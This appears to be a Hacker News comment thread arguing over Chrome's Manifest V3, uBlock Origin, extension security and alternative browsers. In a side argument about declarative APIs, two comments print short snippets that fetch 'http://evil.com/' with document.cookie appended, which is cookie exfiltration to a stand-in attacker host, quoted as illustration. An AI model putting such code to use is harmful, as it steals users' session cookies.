It doesn't say we never _provide_ personal data collected from you (i.e. not through a sale). Nor could it, because the US government assumes the power to secretly obtain data about people from tech companies. The legal mechanism is in place (NSL)'s, and we know it has been in massive use, thanks to the Snowden leaks.


What's funny is that extensions were supposed to be a way to let you do the things the browser didn't want you to do. Guess that was a bit too much freedom for Google to accept, so they had to make a store with a gate, and destroy the APIs so that they're useless. Then they had to make up some reasons to justify that and ram it through the pipeline despite everyone's objections, and the frog got boiled.

Now we're back to needing an actual extension system that does what extensions were supposed to do in the first place.


> Then they had to make up some reasons to justify that

Hate to be the one to defend Google here, but the reasons weren't that unreasonable. I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

It's just that uBlock Origin is so insanely useful, important and trusted, it should get full access to the entire browser regardless. Honestly, it should be literally built into the browser instead of being a mere extension. Only the conflicts of interest inherent in an ad company maintaining an ad blocker prevent that.


> I want my browser to prevent random extensions from directly reading web page data.

To be honest, to me it sounds like you don't want browser extensions then.

To me, directly messing with web page data and browser behaviour is the whole point of a browser extension - what else is a browser extension for?


Why should there not be a middle ground between “can do absolutely everything with all my data” and “is basically a glorified bookmark button” based on the level of trust I have for an extension?

Because security is the pretext, not the goal here. I'm sure browsers could have better security controls for extensions, but giving users extra control over software doesn't seem to be very popular among corpos nowadays.

Because the browser already has bookmark buttons

The purpose of browser extensions is to build up an install base then sell out to some corporation that then promptly leverages that user base to exfiltrate data and monetize it.

No thanks. They should have to declare to the browser what it is they want done instead.


This point would be far more credible if browsers weren't in business to do what you claimed extensions are there to do.

I'd also argue that creating a full browser without a profit motive is more unrealistic than creating an extension and uploading it - for free - to a web store.


Right, basically no web browser has a profitable business model except through licensing or being subsidized through some other branch of the business.

The best pure browser company in history was Opera, and they didn't fail because they weren't innovating. It is simply not a survivable model. People don't remember anything, but during Google's recent anti trust case, one floated "solution" was to spin Chrome off as a separate company, but that was regarded as unrealistic partly because such a company would not have a credible path to profitability separate from Google.

I happen to disagree, they could have collected a search licensing fee just like Firefox but that model is already being regarded as monopoly adjacent.


FYI, Opera didn't fail as much as they sold out. It was still sustainable, but the former founder/CEO left over this spat and formed Vivaldi over it.

Thanks, that's good info. I found this thread from an ex Opera employee and to your point, they could have kept on with Presto, but didn't [1]. What remains true is that bad management chased profits and found a better path to more revenue by caving to webkit and Chromium. So it wasn't strictly unsustainable so much as outcompeted by better economics that came from abandoning Presto. I consider the soul of Opera to be gone at this point and the amount of personal integrity and vision it takes to swim against the current of short term revenue is another manifestation of unfavourable browser economics for sustaining an independent engine.

1. https://old.reddit.com/r/operabrowser/comments/3jxud3/exoper...


And extensions do exactly that in Firefox. When installing (or updating) extensions you're notified of any and all permissions the extension is requesting from the browser and you're given the choice to proceed with the installation or not. Google goes a step further and just straight up denies user choice entirely.

I think you're confusing the extension and the browser. The browsers are generally in the business of supporting an advertising company.

It still sounds like you don't want browser extensions then.

... But they do that. The declaration is written in a language called JavaScript.

Javascript is not a declarative language.

There are at least two uses of "declare": one the colloquial english usage that has been around for at least hundreds of years, which roughly means "announce" or "state". The other use of declare is the much more specific programming language version which you're referring to.

Here's what the comment you're responding to said:

> They should have to declare to the browser what it is they want done instead.

Arguably it's pretty clear they meant declare in the first sense.


Sure it is.

Here's how you can write a declaration that you want to exfiltrate cookies:

    document.addEventListener("load", function(){
        fetch("http://evil.com/"+document.cookie);
    });

That's not a declaration, that's a statement. An imperative statement, to boot. Here's what it would look like in an actual declarative language:

  <body onLoad="http.GET('http://evil.com/"+document.cookie')">

What do you think is the difference between a declaration and a statement?

absolutely insane take

Bro, they have to declare there Firefox's policy. What the heck are you doing? Hallucinating claim after claim to support your weak defense. Just stop

"Declare" means the extension tells the browser what they want to filter and then the browser does it internally without ever allowing the extension to read and write private information.

The argument has nothing at all to do with declaring permissions in a manifest.


What would the API for this look like?

LOL brother, it won't work the way you wish it to work.

Yes, but if you write your own extension maybe you want to read and modify the data. For example, patch fingerprinting script so that it gets the wrong result.

Furthermore, malicious extension can read the data from the DOM, from forms (for example, password or credit card fields), and in some cases, from JS variables. They can insert fake information into the page. So preventing extensions from reading network data still leaves a lot of options for a malicious extension.


So you're saying that because Google didn't completely up-end the security model and break almost every extension in the one-go, we should have no-progress towards a more secure extension model?

uBlock Origin via declarative blocks is almost as powerful as the original. While I would trust gorhill with almost unfettered control over my browser, I don't trust EVERY extension owner (no do I trust uBlock Origin in perpetuity).


>So you're saying that because Google didn't completely up-end the security model and break almost every extension in the one-go, we should have no-progress towards a more secure extension model?

A funny argument to make because the thing that would make such a measure ridiculous as you rightly point out, is exactly what already makes the Manifest changes ridiculous in the first instance. They were making a rhetorical point and you elaborated on their point for them as if doing so expressed a disagreement.


I think a big step forward, towards a better security model, was overall a good thing, even if it meant that a good extension no longer had unfettered access to everything your browser saw. I don't think this change is ridiculous at all. And I don't want them to stop here either! v4 should close more of the avenues that malicious extensions are abusing! Extensions should declare everything up-front, so it's easy see if abuse is occuring.

How do you secure against the system vendor (in this case the browser) limiting what the consumer/user can or can't do (alone or with the help of third parties) with the product after acquiring it though? After all security for individuals against commercial and otherwise organized interests is one of the, if not the most important security after life and health. Even if one values the market overall for financial reasons, there is a solid argument that preventing modifications (and thus also repairs) is anti-competitive. It would be damaging to society if manifestV4 is realized restricting what can run further, much like printers and operating systems where the users ability to run software they bring themselves is limited has been. Just as no one should have to go to a mechanic with a special deal with the manufacturer to get their car or tractor to work as desired, neither should users of software.

>How do you secure against the system vendor (in this case the browser) limiting what the consumer/user can or can't do (alone or with the help of third parties) with the product after acquiring it though?

If you don't like what a browser is doing, then move to another one? You're acting like you have spent a tonne of money on buying Chrome. Even if that was the case, it's not a clear case of an anti-user behaviour. There is a good reason to deprecate the webRequest API, and we'll see more browsers move towards that in the future (Safari has had declarative blocking for many years now, I believe).

>preventing modifications (and thus also repairs) is anti-competitive

There is nothing stopping someone from forking a manifest v2 version and maintaining it. I'd argue this can't be compared to any company actually doing anti-competitive things (e.g. tractor company, printers, ice cream machine companies, etc.)


You use a different browser, like Firefox.

A browser that is routinely dumped on by HN for not being perfectly managed lol

HN routinely dumps on chrome too. There is no browser HN likes.

We should have the option to limit an extension to certain tabs or websites or at least windows, and extension authors should also have the option to specify that.

An adblocker, by its nature, needs to access *. But Return YouTube Dislike could statically specify that it will only run on youtube.com, and that's fine.

But the option to enable access to * is essential.


>An adblocker, by its nature, needs to access *

Well that's what is in contention. Does everything claiming to be an adblocker really need access to *? Is Adblocker5++ (totally not malware) entitled to as much access as uBlock Origin? You can declare upfront all the URLs you don't want accessed (which on top of security gives a substantial performance boost), and who's to say someone won't figure out a better way of working within these constraints?


Removing capabilities is not progress towards better security. Putting them behind opt-in permissions, making permissions more granular, more robust... those are security upgrades. Removing capabilities is a feature downgrade.

>Hate to be the one to defend Google here, but the reasons weren't that unreasonable.

Sounds like some kind of Stockholm syndrome. Years ago, it was standard practice for software to be designed so that users could grant permissions to access invasive methods or functions.

Google relies on users' personal data (ads), which is why they introduced a unique ID to their Chrome browser (to track).


When was that standard practice? Cause years ago (like 2000) I remember even trivial and simple software (WeatherBug) being able to read/write all over the computer (Windows). And some crap I just installed on Win11 can see all over the box, just slightly less.

I want my browser to prevent random extensions from directly reading web page data

I also want my browser to prevent random third-party javascript from doing the same. And I care more about that one, because as a user I don't have control over said third-party javascript while I do have control over the extensions I'm using. The browser is supposed to be a user agent, not act as an extension of the website owner.


If you look at all the threat vectors of a browser from a user perspective, a rogue extension is well at the lower end.

If you look at the threat vectors for the revenue of a company like Google, extensions that aren't limited by the browser are pretty much number one.

This should tell you everything you need about the matter.


If you've run a site with CORS reporting enabled, you'd see that a significant fraction of your userbase have malware extensions running (prior to manifest v3). I was absolutely shocked when I looked at the logs a decade ago, and I bet the problem is far worse these days with the proliferation of malware buyouts of legit extensions.

Google has no shortage of options for serving up ads that can't be blocked by normal ad blockers across all their properties (youtube, search, etc.). They in-line the ads these days! And if they really cared about the fraction of a fraction of a percent of people that even install any kind of adblocker, they could make the served ad content un-blockable by serving it the exact same as the content.


> I want my browser to prevent random extensions from directly reading web page data

This is so funny to me. Coming from a Netscape Navigator world, when extensions first came out, they were supposed to allow the user to add functionality to websites.

Why would someone install "random extensions" that they dont trust. And also, what would extensions do if not read and write data to websites? .

Sign of the times I guess.


Extensions are set to auto update by default, and it's not obvious at first how to disable that. It's also disallowed to install an extension you've built from source on most release builds, without messing with a hex editor. So essentially, any extension you install is liable to be come a "random" extension, if for example, the author sells out, or something like the attacks on NPM were to happen.

These are the real problems.

> Why would someone install "random extensions" that they dont trust.

Same reason why people download random stuff and run it with administrator permissions on Windows.


> Why would someone install "random extensions" that they dont trust.

An extension that you trust today can be sold to an unscrupulous third-party tomorrow. That has happened many many times and will continue to.


And sometimes the unscrupulous third party decides to build a browser and take over the market via forcing hardware vendors to bundle it with their OS. Like Google.

so, it should not be updated automatically. so, you should not trust something that install updates (literally - install another software) without your agreement

Back in the mid 90s when the web started to be all the rage, I remember reading a comment I thought hilarious and kind of right. Paraphrasing a lot it went like this:

"Somehow, when people get into the internet, their IQ decreases like 50 points. Like, if a guy knocked on your house door and offered you to give you a million dollars if you just gave him a thousand now, you would tell him to F. off. But somehow on the internet people thing it's right"

Same with these apps, someone comes and tells you to let him install this great water appliance for your backyard. You let him come in. But somehow in the internet, you also give him the key so that he can come in again anytime he wants... he may sell the key, lose the key, do something malicious later,etc. But due to ignorance, people dont grasp what they are doing in the digital world. People lack the necessary mental models.


> I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

Agreed. And you would think most paranoid HN types would too.

> It's just that uBlock Origin is so insanely useful, important and trusted

Maybe I'm foggy on the history. But isn't this like Fork #4 or #5 of some previous AdBlock extension?

Seems like the only business model for this type of extension is "selling out" for certain ads. And then the cycle repeats and forum posters tell you to install qBlock Omega or whatever. Maybe Mozilla doesn't want to get in the middle of this?


> Maybe I'm foggy on the history. But isn't this like Fork #4 or #5 of some previous AdBlock extension?

IIRC it was written from scratch. It was called uBlock before, then a co-maintainer tried to pull some shit, and the original author had to fork it with a new name (I don’t remember the details, it’s been ages since then).

No selling out yet. The author also explicitly says they don’t accept donations. I don’t think he’s looking for a business model. But if that changes – yeah, the fork button is right there, so I don’t see a big problem here.


> Hate to be the one to defend Google here, but the reasons weren't that unreasonable. I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

Don't kid yourself, even with mv3 if you install a rogue extension it's going to have access to a lot more data than you would be comfortable sharing to.


Yes, which is why it is important to lock such things down.

You can't trust a code that you didn't audit before. End of story.

What you are asking for is simply impossible, even without any permissions rogue extensions can still do a lot. It's what some developers spend their entire time working on.

If Google couldn't fix it with Android, which has granular permission per applications, why do you think it's going to be even remotely effective on the web browser ?


How would you do that?

Of course it's tempting to reply "don't install random extensions". But a bigger point here is that browsers have grown so massively complex that it's almost impossible to build one, so we don't have an ecosystem where you can choose your browser for safety and I can choose mine for freedom. Of course, Google has had a big incentive and hand in making it this way.

> I want my browser to prevent random extensions...

Why are you installing random extensions?


Not GP, but sometimes I want my browser to do pretty random/niche things without that compromising all of my browsing data.

How can the browser tell the difference between a random thing you want and a random thing you don't want?

The permissions mechanism.

How can the permissions mechanism be fine grained enough to prevent bad random things, and coarse grained enough that you can understand it?

Requesting site access by click or by URL really isn't rocket science.

Not nearly every user will get it right, so extensions will probably still have to be monitored for malware for the foreseeable future, but it gives many users at least a chance at privilege minimization.


Have you seen AWS IAM?

Power users who care about this don't need a GUI - a text file config in any format will do. Especially in this era of LLM assistance.


this is not a solution. Running an untrusted software will always be a security drawback. Permissions/sandbox/etc can decrease risk, but not eliminate it

Significantly reducing the risk is enough for me in many cases. Chasing “zero risk” is often a fallacy.

Expressing intent is good enough for me for this purpose. I understand that there are additional implementation specific risks.

Create a new profile, do the niche thing there, separately from the rest of your browsing.

I'm not. The only extension I trust enough to install is uBlock Origin.

Well great! You are already protected from random extensions then.

Yeah, by opting out of them altogether. I'd very much enjoy having useful extensions that are not dangerous instead.

You can't trust a code that you didn't audit before. End of story.

What you are asking for is simply impossible, even without any permissions rogue extensions can still do a lot. It's what some developers spend their entire time working on.

If Google couldn't fix it with Android, which has granular permission per applications, why do you think it's going to be even remotely effective on the web browser ?


> I want my browser to prevent random extensions from directly reading web page data.

I don't want that! I want to be able to install any extension whatsoever (as we still can, more or less, install programs). And if I'm clueless enough to install "random" extensions that'll harm me, then shame on me! How often has it happened for the whole existence of Manifest V2 anyway?

Maybe we could have tolerated a well-hidden, well-protected "advanced" flag to open that possibility. But removing Manifest V2 altogether is unforgivable.

Also, security is a very very very weak argument, as many ads are much more dangerous and toxic than any popular extension will ever be.


>it should be literally built into the browser

Orion does this. It's still a little too rough around the edges to recommend as a daily driver though.


> I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.

I was under the impression that manifest v3 still allowed extensions to read anything, just not modify. Is that not the case? (Random link because this is hard to search for: https://news.ycombinator.com/item?id=38303446 )


Yeah, if that's true then there's little point to Manifest V3... That completely invalidates the argument that it increases security by denying private page access. Maybe I misunderstood Manifest V3.

All roads lead to Occam's Razor and POSIWID: the point of Manifest V3 is to block adblockers.

"Random" is a funny thing to call an extension that you have deliberately installed.

I also don't want "random" programs accessing my home folder. That would be terrible! Who knows what programs that could be! I do however want the very specific programs that I have intentionally installed to be able to access my home folder easily. Same for extensions.

The goal here isn't really to protect me from extensions. Extensions don't do anything on their own, they just sit there and wait for me to install them. So the goal is apparently to protect me from me (installing an extension), which really is to say protect their business (ads) from me (blocking them).


"Random" is what I call pretty much every extension that is not uBlock Origin. I absolutely want them limited to the fullest extent. Maybe if they were, I would actually install some of them.

> I do however want the very specific programs that I have intentionally installed to be able to access my home folder easily.

I don't. My standard operating practice is to virtualize them.

My security posture is considerably more lax towards free and open source software, for obvious reasons, and even then this trust only extends to the software in my Linux distribution's repositories. Stuff coming from PyPI, npm, cargo, ruby gems, and other such "developer centric" repositories get the full virtualization treatment. If it's easy for randoms to publish packages, then it's equally easy for malware to make it in.


You should make a browser for you, like a QubesOS browser. Do you use QubesOS? If not, you should.

But you can't lock down everyone else's general-purpose computers just because you are more careful than the average. You're supporting the big corporations in the war against general-purpose computing here.


What do you use for virtualization for tools from developer repositories? Run them in a VM or sandboxing like bubblewrap?

QEMU virtual machines. Sandboxes like firejail and bubblewrap share a kernel: attacker is one exploit away from root. Hypervisors present an infinitely smaller attack surface, and if they're ever defeated the entire industry is done, not just me.

I have a base system image that gets forked off into delta qcow2 images for every project I'm working on or whatever ephemeral execution context I need.

I started a side project to build software just to manage those VMs. I'm daily driving this thing even though it's my first "vibecoded" project, it's just way too useful and has saved me quite a few times from accidents.

https://github.com/matheusmoreira/virtdev

The firewall works but it's pretty clunky. I'm working on a custom Rust network stack to replace it.

You'd probably prefer something that isn't literally made by one guy and his AIs though. Docker sandboxes seem to be a good solution that also employs virtualization.

https://news.ycombinator.com/item?id=49239751

Before I made all this, I used to use firejail.


This sounds like another one in those class of arguments that are essentially "We can't let users accidentally harm themselves on the devices they own." While I appreciate ergonomics and sensible defaults, ultimately I don't need you, Google or anyone else telling me I can't do something with my device because it's too dangerous to me. I mean I have a huge F U for anyone who tells me that quite frankly, just as I would if they said it about my car or my kitchen knife. I cleared the age of consent decades ago, I will use what I bought and I will accept responsibility for all of the outcomes. These little poindexter dictator nerds of IT who think they get to control everything about what I own can F right off. I applaud and will participate in any class action lawsuit against them and hope for the maximum penalties to be inflicted upon them.

Mozilla relies 85% of income from Google for making default search engine Google.

They probably have strong implicit pressure not to.


Mozilla has 300+ million dollars in the bank.

So does Wikipedia but they still desperately beg like they're about to go out of business.

Your browser does prevent random extensions from reading web page data - it prevents all of the ones you don't install!

More seriously: if you don't want X to do Y, the solution is to not give X the permission Y. The platform overlord removing the premission Y completely is a terrible solution.


Then don't install them. I want my extensions in my browser on my computer to do whatever I allow them to do and not what's allowed by Google.

> I want my browser to prevent random extensions from directly reading web page data.

Fine, then don't install them?

It's like saying you want your TV to stop random people from watching it, but the obvious solution to that problem is to not invite random people into your living room.


Of course the reasons weren't unreasonable, that's what made them great excuses for specifically blocking ublock origin.

They don't specifically block uBlock Origin though. I have no doubt they intended it to, and that's literally my only objection to Manifest V3: it's good but it hurts uBlock Origin therefore I don't accept it.

The right thing is to simply bypass all of that. The fact is uBlock Origin should be literallly built into the browser like the good old popup blockers once were.

If only we had a browser that was independent of ad money.


Of course the reasons weren't specific to ublock origin, that's what made them great excuses for specifically blocking ublock origin.

... the greatest danger to us is masterless men; lacking a coercive power to tie their hands, they would destroy society. How else but by binding to lord and master can they be held to the laws? So thought men during feudal times.

In fact, it is possible for people to be held to good conduct without being bound into a single hierarchy, and it should be possible for software to be held to good conduct without giving such power to single monopolists. But it's not in Google's interests to build such mechanisms, any more than it was in the interests of the feudal overlords to look for alternatives to their rule.


I'm supposed to be the master, actually. It's my computer, any foreign code is essentially a subject in my digital domain. It should be literally impossible for them to do something I don't want them to do. As the god of my little digital realm, I should have maximum power and freedom, while foreign developers get the absolute minimum amount of power that works, and in the ideal case this minimum is zero.

The fact someone gave developers a turing complete language inside the browser where random code is automatically downloaded and executed is a major reason why we even have uBlock Origin in the first place. The vast majority of developers heavily abuse this privilege and cannot be trusted, and that is why we block them with extreme prejudice.


I agree that we should able to be fully in control of what we run on our machines, but that should also include being able to decide who we trust to mark , or gatekeep, code as trustworthy. Both having to run code from any random website, and having to trust exactly one mega company, means you are not the master.

I think nobody is against the availability of sandboxing tools for browser extensions - they just want them to be options and not requirements or defaults.

We seem to have a similar philosophy. Have you found a good way to deal with modifying or selectively disabling things like webpacked js or react?

I've tried everything from relying on uBlock Origin's anti-sabotage injections to literally reverse engineering websites and directly using all the internal APIs their own javascripts consume.

My dream was to have a "custom HTTP client" for every website. Instead of one browser for all sites, I write "adapters" for them that scrape the data into my own schemas. Maintaining this was far too much work back then, but now that I've got AI... I think I might try it.


>uBlock Origin's anti-sabotage injections

Do you mean the rules like

    *##+js(acis, document.oncontextmenu)
(an example I just added (copied) today)? I've had a lot of trouble figuring out how to make these properly.

>reverse engineering websites and directly using all the internal APIs their own javascripts consume.

Interesting. By userscript or some other way? I've run into a number of situations where I either can't find a pointer to the internal js, or if I do find one, the browser or something ends up preventing me from accessing or modifying internal state with some sort of permission error. The latter might just be React though.

I'd be very interested in looking, if you have open sourced any of this.


This is the way. The owner of the computer should be the ultimate authority over what gets run and not run on that computer. Not Microsoft. Not Apple. Not Google. Not Mozilla. Not some web site developer.

Nothing stops people from using a fork with manifest v2 support restored. In fact "VibeChrome" would probably be a successful product.

It was by many, and it was decided to be too hard. Nobody is ready to do that.

First you'd get sued because chrome is a Google trademark

The Google Toolbar for Internet Explorer let users search Google directly from any webpage, block pop-up ads, autofill web forms, and highlight search terms. It also displayed PageRank metrics, translated foreign languages, checked spelling, and managed web bookmarks.

Imagine the massive amount of data they must have harvested through it.

No worries. Reading the rest of your comments shows, that your defense is paper thin .

Don't defend them then. Do you believe the same should be true of your operating system? If not, then it shouldn't be true of the browser either.

> Do you believe the same should be true of your operating system?

Yes, and I have actually started virtualizing everything inside my computer because of that belief. I don't want random software touching my trusted host.

"Random software" is currently defined as anything outside the official repositories of my Linux distribution of choice. I don't want to share a home directory with such things. I don't want to share a user and its permissions, I don't even want to share a kernel with them.


There's a difference between you virtualizing programs and your OS vendor virtualizing programs for you without giving you an opt-out. Cough snaps cough.

Agreed, and I do think it's unfortunate that our browsers are funded by ad tech. I want that to change.

> Honestly, it should be literally built into the browser instead of being a mere extension

Aaaand that's why I'm using Vivaldi over here (which has a built-in adblocker).


The amount of replies this has gotten regarding the use of “random” is a fine example of the state of discussion on the internet and in general, and how HN is in no way immune.

Clearly “random” was used as a means of saying “any”, to describe extensions the author hasn’t thought of. That will be obvious to anyone arguing in good faith and steel manning the argument.


> Google ... had to ... destroy the APIs so that they're useless.

I see this repeated over and over and yet uBlock Origin Lite still seems to block almost all ads. I'm not saying I wouldn't prefer the non-lite version. But, given I basically still don't see ads it's kind of hard to argue Google destroyed the APIs so that they're useless


The crux of the difference is the webRequest API which is only available in Manifest v2. This allows uBlock to strip all tracking data from the requests themselves. So while Chrome w uBlock Lite is hiding almost all the same ads from you, it's not protecting you from tracking

The Lite version also relies solely on filter lists that require you to update the extension itself while the MV2 version can do so dynamically. Additionally, it lacks CNAME Uncloaking which I imagine will become much more commonplace soon enough which will make it impossible to block those ads.


> uBlock Origin Lite still seems to block almost all ads

https://news.ycombinator.com/item?id=49305464


There’s also ad blockers for iOS safari, which I’m pretty sure doesn’t support ublock. There’s nothing in manifest v2 that’s required for ad blocking.

uBlock Origin Lite is available on iOS/iPadOS for Safari however last time I checked it’s inferior to AdGuard/Wipr due to the API it uses (it only works in Safari but doesn’t provide ad blocking in the web views like the other two do). Otherwise it’s equivalent with the desktop version.

Browser extensions were also one of the biggest ways to distribute malware. The situation was genuinely horrific. Malware distributors would offer popular extension devs millions of dollars to buy the extension, then silently insert malware which gets auto deployed to millions of people.

Lungs are one of the most effective ways of distributing disease. You'd be shocked at how many people get sick and die because LUNGS! We should immediately do away with lungs!

But why blame the extensions instead of the auto-update feature? Wouldn't it be more effective to build external code review practices around the extension eco-system? For example, if you want to publish or update an extension, you first have to review someone's elses or something along those lines.

That sounds more like an issue with the update policies.

Why haven't they been prosecuted? And why hasn't this "cindyllm" bot account been deleted yet? Clearly a shadowban didn't send the message.

Firefox extensions are already so incredibly locked down. It used to be they could edit any part of the UI anywhere. Now they each get a button at the end of the URL bar if they're lucky, otherwise it's some obscure hamburger menu item.

You have full control of whether or not their button is in your toolbar.

If they are hidden for you, it's because you, the user, hid them or enabled the overflow extension menu.


I, the user, don't understand how this works and just see my browser thinking it's better than me and should be my master.

> extensions were supposed to be a way to let you do the things the browser didn't want you to do.

If that would have been the case, extensions wouldn’t exist.

Extension are a way to make the browser do what the browser manufacturer didn’t think or care about.


There are good solid reasons why Manifest v3 is preferable for most extensions.

The issue is that adblocking doesn't work with it, so an addition, or workaround should be made, but when Google has the amount of influence they have, that didn't happen.

The upshut is that people hate ads and like free stuff, so there is now a good selling point for Firefox. Hell some of us switched to Firefox because it blocked popup ads and had tabs, back in the day.


> The issue is that adblocking doesn't work with it

Except this is objectively not true…

uBlock Origin Lite is nearly as good as uBO and blocks nearly everything except for mostly Twitch ads.

Manifest v3 is a big security upgrade and effectively closes off the permanent RCE pathway that v2 allowed.


So we already see one major ad category it's unable to block. When will advertisers catch on to put more of their ads in that category?

Twitch ads haven't reliably been blocked by ublock origin (in any browser) for years. The "best" solution people came up with is replacing the stream with an ad-free low res version for the duration of the ads, which doesn't make for a very enjoyable viewing experience. There were/are some more experimental options like m3u proxies to jurisdictions where Twitch isn't serving any ads for one reason or another, but those aren't reliably working all the time either. In any case, somewhat outside the scope of ad blockers and closer to paywall circumvention-ish.

Except normal uBO also failed to block Twitch ads so there’s no difference here.

I often forget how browsing the web looks for most people. Can't understand why they put up with it, or do they just think that it's part and parcel of the internet to have every page look like a slot machine from hell?

I currently don’t use ad blockers. The only time I used ad blockers was when a previous employer specifically asked me to, when using a company machine.

> Can't understand why they put up with it

To see which (rare) sites don’t put up a million ads and actually care about the reading experience.

A lot of the top-listed sites on HN are small blogs without ads (or in the case of danluu.com or lwn.net - without almost any formatting).

daringfireball.net is notable for actually having small, non-intrusive ads that I wouldn’t ever feel the need to block (unless you consider the entire site an ad for Apple but that’s a seperate concern).

> do they just think that it's part and parcel of the internet to have every page look like a slot machine from hell?

It is integral to the business models of the sites putting up those ads. And if those sites don’t make money then they’ll also be unable to pay writers. Much like herd immunity or financial speculation there will always be “somebody else” to watch the ads and essentially subsidize the ad-blocking audience, but I’d rather not be one of those people, I want my usage to be worth the while for the writers.

I am sometimes (rarely) willing to pay for an ad-free experience if I’m a repeat visitor. But more often I’d rather not visit at all if a site is too annoying. Another unfortunate situation is that even if you pay for a subscription, some sites have no ad-free option, such as the New York Times.

The big exception is YouTube, where I visit often, am bombarded with ads but also don’t want to pay Google.


In an ideal world, I would do exactly what you do. I don't WANT to block ads everywhere. I would love to support my favorite websites, and if watching a couple of ads is what it takes for them to stay online, then I don't really mind.

Problem is, the ads I see when I disable my ad-blocker are uniformly terrible. Maybe this is because I'm in India, but I've never once seen an ad that wasn't outright disgusting, let alone useful.

I regularly see ads for: escort services, shady hair loss prevention pills, shady weight loss pills, astrology, TV shows and movies in languages I don't understand, gacha games, gambling apps, educational programs I can't sign up for, apps that are clearly malware. Once Instagram inexplicably showed me ads for expensive lab equipment only available in Germany for a whole week.

I would like to see ads for: local businesses around me, concerts and gigs in my city, new restaurants around me, indie fashion brands, TV shows and movies in languages I can understand. Basically, ads based on my interests and recent search terms.

The ad networks insist on delivering the worst kinds of ads to me, sometimes accompanied by imagery I would prefer not to see (e.g hair loss and dermatology ads). The websites I frequent and want to support don't get to choose what ads I'll see. All they can do is insert the ad-network's JavaScript into their pages and hope for the best.

Unless the networks can guarantee that I won't see something illegal, harmful, or plain disgusting when I enable their ads, I'll keep my ad-blocker on. I'm not going hurt myself for somebody else's business model.


In theory site owners could be more selective about the ad networks they partner with. They bear a responsibility for a poor user experience, but many don’t care.

I remember hearing about a lawsuit several years ago from several news organizations against an ad blocking company in which they described themselves as “ad companies that serve content” as opposed to “content companies that serve ads”.


While I think I agree with you in principle, it's worth pointing out that at least some of these targeted/relevant ads you want come with privacy concerns which, at least in my opinion, are just as important if not more so than the content/experience of the ads themselves.

Either way though, GP putting the responsibility on the viewer, at this point - given what we know about how the ad companies operate and use our data - is just absurd. We're not the ones who burned up any good will in this particular social contract.


Most of those sites that would shut down without ads are providing negative value and would make the world better if they shut down.

Sometimes I make an exception. Sometimes.


Then don't visit? Or realize how bad they are with ads and bounce? They probably track bounce rate as ads load.

The situation has been manufactured by the advertising industry such that the individual's rational response, blocking ads for multiple reasons, hurts the web in the long run. At the end, it will be said, "it was the ad blockers' faults", not "there were too many ads + tracking systems and ads could contain malware"

I turned off my adblocker on 404 Media since I wanted to support them, I loaded one new tab in an article and it maxed my CPU at 100% for so long that I paused and had to figure out what was spiking my computer.

Immediately turned it off.


They have a subscription I think. You can pay them actual money.

Yes, in the same way constant software malfunctions and errors are normal and tolerated.

Open your browser’s dev tools while loading a website and there’s usually a continuous stream of HTTP and JS errors and warnings. That websites actually work surprises me sometimes, but that’s the pragmatic beauty of the web.

I just live in the world where most things are crap.

People put up pages because they want to express themselves and/or receive views or engagement.

AI kills the first half, and trying to sell my attention kills the second half.

I don't stick around for it. I click into "the secret romantic lives of elephants", hit popup hell, then realise I really didn't care. I often can't even remember what I clicked on as soon as I hit back.


Maybe it’s on purpose to keep people addicted to installing apps

Chome with uBlock Lite looks, uh, pretty similar to Firefox with uBO.

Try visiting YouTube.

Is this supposed to be a dunk? uBO Lite also blocks YouTube ads.

You try.

uBO Lite blocks ads on YouTube just as well as uBO did.


Also on YouTube

> every page

That's a bit hyperbolic. The areas of the internet I frequent do not have egregious ads (for example, this page). Areas where I really would like good ad-blocking (youtube) are often not covered by these ad blockers. Thankfully Youtube Premium isn't too expensive and solves that issue.

Maybe it's better these days but I always found browser extensions (including uBlock) had a pretty big performance hit, so I've always shied away from them (with the exception of a password manager).


> Thankfully Youtube Premium isn't too expensive and solves that issue.

True, but some of us refuse to give that company money on principle. The minute I can't watch YouTube without ads is the minute I stop watching YouTube. (The creators I follow make way more money off me on Patreon than Google would ever pay them, anyway.)

> I always found browser extensions (including uBlock) had a pretty big performance hit

I always found that not using uBO was a pretty big performance hit. :)


Do you use Invidious?

uBlock causes a huge performance improvement for most regular people's computers.

> Areas where I really would like good ad-blocking (youtube) are often not covered by these ad blockers.

uBlock Origin works perfectly fine to block YouTube ads.

> I always found browser extensions (including uBlock) had a pretty big performance hit

In various places (e.g. the wiki [1]) you can find benchmarks showing that webpages load faster, rather than slower.

[1]: https://github.com/gorhill/uBlock/wiki/Various-videos-showin...


adblock works well with regular youtube ads (not the one inside the actual content).

For the latter, there is sponsorblock.

Guess it was a bad idea for everyone to switch to a browser made by one of the world’s biggest advertising companies.

uBlock lite works pretty well for me with Chrome

The other browser they pay for isn’t the first alternative I’d run to…

Wtf, simply not true:

Brave: chrome://flags/#brave-extensions-manifest-v2 > brave://settings/extensions/v2 > Enable uBlock Origin (Brave-hosted, even better).

Helium comes with uBlock Origin pre-installed.

Edge even still has it https://microsoftedge.microsoft.com/addons/detail/ublock-ori...

And I'm sure others ...I personally only use/test Brave, Brave Origin, Helium and Firefox.


Edge is dropping support. Helium is not a major browser.

Brave is the only one that might be considered a valid point. However, because of Chromium dropping support they've had to implement a custom bypass to support Manifest v2 and they are also hosting a version of uBlock Origin for Chromium on their own servers.

It's really questionable how long this state of affairs can go on for. Brave has said they will support it "as long as they are able" but Google could easily just remove the `webRequest` API from Chromium or the engineering burden to keep it alive might just get to be too much

Unfortunately, I think it has an expiration date on any Chromium-based browser.


Agree on the last part, let’s see for how long.. but for now it’s simply not true.

Edge will lose it within the next few months: https://blogs.windows.com/msedgedev/2026/08/07/moving-the-mi...

Ahh so this will be what moves me off of Edge. Microsoft has almost entirely pushed me out of their ecosystem at this point.

RIP corporate users that can't install their own browsers but can install extensions

The title says "major browser", which none of those are.

Brave surely is a major browser with 100+M MAU, not too distant from Firefox with 150+M MAU.

Brave blocks those ads anyway so no point in Ublock, maybe that's why it's left out. It does inject it's own ads though, and then there's all the crypto nonsense.

Ads on Brave are opt-in (and not embedded on webpages anyway) and the "crypto nonsense" is a way for them to try to stay afloat without having to accept money from Google and the likes.

They are opt-out, not opt-in. Big difference.

Opt-in. Someone else linked Brave's blog below. Read it.

https://support.brave.app/hc/en-us/articles/38305898674957-H...


Have you ever actually used Brave? Because then you would have noticed the huge glowing opt-out billboard of a new tab page.

